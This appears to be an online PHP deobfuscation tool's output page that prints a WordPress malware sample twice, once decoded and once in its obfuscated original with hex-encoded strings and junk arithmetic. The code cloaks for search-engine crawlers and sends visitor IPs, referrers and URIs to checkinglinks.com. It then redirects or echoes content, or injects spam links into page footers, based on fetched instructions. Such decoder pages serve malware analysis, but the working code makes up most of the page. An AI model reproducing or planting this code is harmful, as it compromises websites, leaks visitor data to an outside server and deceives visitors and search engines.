Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if (is_user_logged_in() == FALSE): ?> <?php $_0 = array( '#bing#i'..
Decoded Output download
<?php
if (is_user_logged_in() == FALSE):
?>
<?php
$_0 = array(
'#bing#i',
'#duckduckgo#i',
'#zapmeta#i',
'#seznam#i',
'#google#i',
'#msnbot#i',
'#slurp#i'
);
foreach ($_0 as $_1) {
if (preg_match($_1, $_SERVER['HTTP_USER_AGENT'])) {
$_2 = str_replace('http://', '', $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$_2 = str_replace('https://', '', $_2);
$_2 = str_replace('www.', '', $_2);
$_3 = "http://checkinglinks.com/nn/server.php?md5=" . md5($_2) . "&ua=" . base64_encode($_SERVER['HTTP_USER_AGENT']) . "&ref=" . base64_encode(@$_SERVER['HTTP_REFERER']) . "&ip=" . base64_encode($_SERVER['REMOTE_ADDR']) . "&uri=" . base64_encode($_SERVER['REQUEST_URI']) . "&host=" . base64_encode($_SERVER['HTTP_HOST']);
if (function_exists('curl_init')) {
$_4 = curl_init($_3);
curl_setopt($_4, CURLOPT_RETURNTRANSFER, round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2));
curl_setopt($_4, CURLOPT_FOLLOWLOCATION, round(0 + 0.33333333333333 + 0.33333333333333 + 0.33333333333333));
curl_setopt($_4, CURLOPT_TIMEOUT, round(0 + 2.5 + 2.5 + 2.5 + 2.5));
while (round(0 + 948 + 948 + 948 + 948) - round(0 + 1896 + 1896))
strrchr($_5, $_6);
$_7 = curl_exec($_4);
$_8 = round(0 + 105);
curl_close($_4);
if (strpos('vjhitcsqwoogvums', 'cz') !== false)
imagecopyresized($buffer, $_0);
} elseif (ini_get('allow_url_fopen')) {
if (function_exists('file_get_contents')) {
$_7 = file_get_contents($_3);
} elseif (function_exists('fopen')) {
$_9 = fopen($_3, "r");
$_7 = fread($_9, round(0 + 4096 + 4096));
if (round(0 + 1559 + 1559 + 1559 + 1559) < mt_rand(round(0 + 2089), round(0 + 1380.6666666667 + 1380.6666666667 + 1380.6666666667)))
session_get_cookie_params($buffer, $_10, $_2, $_11, $_0);
}
}
if (!empty($_7)) {
$_12 = base64_decode($_7);
$_12 = @unserialize($_12);
$_12 = explode("ver;", trim($_12));
if ((round(0 + 2030) + round(0 + 817.5 + 817.5)) > round(0 + 2030) || curl_setopt_array($_2, $_11));
else {
strval($_0, $_12);
}
$_13 = $_12[round(0)];
if ((round(0 + 1160.25 + 1160.25 + 1160.25 + 1160.25) ^ round(0 + 1547 + 1547 + 1547)) && imagecopyresampled($_13, $buffer, $_5, $_14, $_4))
fgetss($_7, $_15);
$_12 = $_12[round(0 + 0.33333333333333 + 0.33333333333333 + 0.33333333333333)];
}
break;
}
}
if (!empty($_12) && $_13 == round(0 + 0.5 + 0.5 + 0.5 + 0.5)) {
$_16 = rand(round(0 + 100.33333333333 + 100.33333333333 + 100.33333333333), round(0 + 100.66666666667 + 100.66666666667 + 100.66666666667));
header("HTTP/1.1 $_16 Moved Permanently");
header("Location: $_12");
if ((round(0 + 2120 + 2120) ^ round(0 + 1060 + 1060 + 1060 + 1060)) && array_product($_0, $_1))
curl_multi_init($_3);
exit();
}
if (!empty($_12) && $_13 == round(0 + 0.25 + 0.25 + 0.25 + 0.25)) {
echo $_12;
exit();
}
function system_buffer_back($buffer)
{
if (!empty($buffer)) {
global $_12;
$_12 = explode("
", $_12);
if (!empty($_12) && is_array($_12)) {
$_5 = "footer;foter";
$_5 = explode(";", $_5);
foreach ($_5 as $_10) {
$_10 = "</$_10>";
$_17 = 'rcc';
$_14 = $_18 = round(0);
if (round(0 + 1668 + 1668 + 1668) < mt_rand(round(0 + 357.8 + 357.8 + 357.8 + 357.8 + 357.8), round(0 + 642 + 642 + 642 + 642 + 642)))
array_reverse($buffer, $_10, $_15, $_0);
do {
$_14 = strpos($buffer, $_10, $_18);
if ($_14 !== false) {
$_18 = $_14 + strlen($_10);
$_11 = PHP_EOL . array_shift($_12);
$buffer = substr_replace($buffer, $_11, $_18, round(0));
(round(0 + 1577) - round(0 + 315.4 + 315.4 + 315.4 + 315.4 + 315.4) + round(0 + 630.5 + 630.5 + 630.5 + 630.5) - round(0 + 504.4 + 504.4 + 504.4 + 504.4 + 504.4)) ? prev($_14) : mt_rand(round(0 + 394.25 + 394.25 + 394.25 + 394.25), round(0 + 646 + 646 + 646 + 646 + 646));
$_18 += strlen($_11);
}
} while ($_14 !== false and !empty($_12));
if ((round(0 + 1243.5 + 1243.5 + 1243.5 + 1243.5) + round(0 + 543.66666666667 + 543.66666666667 + 543.66666666667)) > round(0 + 994.8 + 994.8 + 994.8 + 994.8 + 994.8) || date($_10, $_16, $buffer, $_16, $_11));
else {
imagecreatefrompng($_0, $_9);
}
}
if (!empty($_12)) {
preg_match('#(<\s*/body\s*>|<\s*/html\s*>)#i', $buffer, $_10);
if (!empty($_10[round(0 + 0.25 + 0.25 + 0.25 + 0.25)])) {
$buffer = str_replace($_10[round(0 + 1)], implode(" ", $_12) . "
{$_10[round(0+0.33333333333333+0.33333333333333+0.33333333333333)]}", $buffer);
} elseif (!empty($buffer)) {
$buffer .= "
" . implode(" ", $_12);
}
}
}
}
return $buffer;
if (strpos('fuctvtungqkglu', 'mwz') !== false)
substr_replace($_18, $_SERVER, $_15, $_SERVER, $_5);
}
function system_buffer_back_sort($_6, $_15)
{
return strlen($_15) - strlen($_6);
}
if (!empty($_12) && $_13 == round(0)) {
ob_start("system_buffer_back");
}
?><?php
endif;
?> Did this file decode correctly?
Original Code
<?php
if (is_user_logged_in() == FALSE):
?>
<?php
$_0 = array(
'#bing#i',
'#duckduckgo#i',
'#zapmeta#i',
'#seznam#i',
'#google#i',
'#msnbot#i',
'#slurp#i'
);
foreach ($_0 as $_1) {
if (preg_match($_1, $_SERVER['HTTP_USER_AGENT'])) {
$_2 = str_replace('http://', '', $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$_2 = str_replace('https://', '', $_2);
$_2 = str_replace('www.', '', $_2);
$_3 = "\x68\164\164\160\x3a\57\x2f\143\150\x65\x63\x6b\151\x6e\x67\154\151\156\x6b\x73\x2e\143\x6f\x6d\x2f\156\156\57\x73\x65\162\x76\x65\x72\56\x70\x68\160\x3f\x6d\x64\65\x3d" . md5($_2) . "&ua=" . base64_encode($_SERVER['HTTP_USER_AGENT']) . "&ref=" . base64_encode(@$_SERVER['HTTP_REFERER']) . "&ip=" . base64_encode($_SERVER['REMOTE_ADDR']) . "&uri=" . base64_encode($_SERVER['REQUEST_URI']) . "&host=" . base64_encode($_SERVER['HTTP_HOST']);
if (function_exists('curl_init')) {
$_4 = curl_init($_3);
curl_setopt($_4, CURLOPT_RETURNTRANSFER, round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2));
curl_setopt($_4, CURLOPT_FOLLOWLOCATION, round(0 + 0.33333333333333 + 0.33333333333333 + 0.33333333333333));
curl_setopt($_4, CURLOPT_TIMEOUT, round(0 + 2.5 + 2.5 + 2.5 + 2.5));
while (round(0 + 948 + 948 + 948 + 948) - round(0 + 1896 + 1896))
strrchr($_5, $_6);
$_7 = curl_exec($_4);
$_8 = round(0 + 105);
curl_close($_4);
if (strpos('vjhitcsqwoogvums', 'cz') !== false)
imagecopyresized($buffer, $_0);
} elseif (ini_get('allow_url_fopen')) {
if (function_exists('file_get_contents')) {
$_7 = file_get_contents($_3);
} elseif (function_exists('fopen')) {
$_9 = fopen($_3, "r");
$_7 = fread($_9, round(0 + 4096 + 4096));
if (round(0 + 1559 + 1559 + 1559 + 1559) < mt_rand(round(0 + 2089), round(0 + 1380.6666666667 + 1380.6666666667 + 1380.6666666667)))
session_get_cookie_params($buffer, $_10, $_2, $_11, $_0);
}
}
if (!empty($_7)) {
$_12 = base64_decode($_7);
$_12 = @unserialize($_12);
$_12 = explode("ver;", trim($_12));
if ((round(0 + 2030) + round(0 + 817.5 + 817.5)) > round(0 + 2030) || curl_setopt_array($_2, $_11));
else {
strval($_0, $_12);
}
$_13 = $_12[round(0)];
if ((round(0 + 1160.25 + 1160.25 + 1160.25 + 1160.25) ^ round(0 + 1547 + 1547 + 1547)) && imagecopyresampled($_13, $buffer, $_5, $_14, $_4))
fgetss($_7, $_15);
$_12 = $_12[round(0 + 0.33333333333333 + 0.33333333333333 + 0.33333333333333)];
}
break;
}
}
if (!empty($_12) && $_13 == round(0 + 0.5 + 0.5 + 0.5 + 0.5)) {
$_16 = rand(round(0 + 100.33333333333 + 100.33333333333 + 100.33333333333), round(0 + 100.66666666667 + 100.66666666667 + 100.66666666667));
header("HTTP/1.1 $_16 Moved Permanently");
header("Location: $_12");
if ((round(0 + 2120 + 2120) ^ round(0 + 1060 + 1060 + 1060 + 1060)) && array_product($_0, $_1))
curl_multi_init($_3);
exit();
}
if (!empty($_12) && $_13 == round(0 + 0.25 + 0.25 + 0.25 + 0.25)) {
echo $_12;
exit();
}
function system_buffer_back($buffer)
{
if (!empty($buffer)) {
global $_12;
$_12 = explode("\n", $_12);
if (!empty($_12) && is_array($_12)) {
$_5 = "footer;foter";
$_5 = explode(";", $_5);
foreach ($_5 as $_10) {
$_10 = "</$_10>";
$_17 = 'rcc';
$_14 = $_18 = round(0);
if (round(0 + 1668 + 1668 + 1668) < mt_rand(round(0 + 357.8 + 357.8 + 357.8 + 357.8 + 357.8), round(0 + 642 + 642 + 642 + 642 + 642)))
array_reverse($buffer, $_10, $_15, $_0);
do {
$_14 = strpos($buffer, $_10, $_18);
if ($_14 !== false) {
$_18 = $_14 + strlen($_10);
$_11 = PHP_EOL . array_shift($_12);
$buffer = substr_replace($buffer, $_11, $_18, round(0));
(round(0 + 1577) - round(0 + 315.4 + 315.4 + 315.4 + 315.4 + 315.4) + round(0 + 630.5 + 630.5 + 630.5 + 630.5) - round(0 + 504.4 + 504.4 + 504.4 + 504.4 + 504.4)) ? prev($_14) : mt_rand(round(0 + 394.25 + 394.25 + 394.25 + 394.25), round(0 + 646 + 646 + 646 + 646 + 646));
$_18 += strlen($_11);
}
} while ($_14 !== false and !empty($_12));
if ((round(0 + 1243.5 + 1243.5 + 1243.5 + 1243.5) + round(0 + 543.66666666667 + 543.66666666667 + 543.66666666667)) > round(0 + 994.8 + 994.8 + 994.8 + 994.8 + 994.8) || date($_10, $_16, $buffer, $_16, $_11));
else {
imagecreatefrompng($_0, $_9);
}
}
if (!empty($_12)) {
preg_match('#(<\s*/body\s*>|<\s*/html\s*>)#i', $buffer, $_10);
if (!empty($_10[round(0 + 0.25 + 0.25 + 0.25 + 0.25)])) {
$buffer = str_replace($_10[round(0 + 1)], implode(" ", $_12) . "\n{$_10[round(0+0.33333333333333+0.33333333333333+0.33333333333333)]}", $buffer);
} elseif (!empty($buffer)) {
$buffer .= "\n" . implode(" ", $_12);
}
}
}
}
return $buffer;
if (strpos('fuctvtungqkglu', 'mwz') !== false)
substr_replace($_18, $_SERVER, $_15, $_SERVER, $_5);
}
function system_buffer_back_sort($_6, $_15)
{
return strlen($_15) - strlen($_6);
}
if (!empty($_12) && $_13 == round(0)) {
ob_start("system_buffer_back");
}
?><?php
endif;
?> Function Calls
| is_user_logged_in | 1 |
Stats
| MD5 | 45a4ead15653b68cd43cc02a20a4340b |
| Eval Count | 0 |
| Decode Time | 131 ms |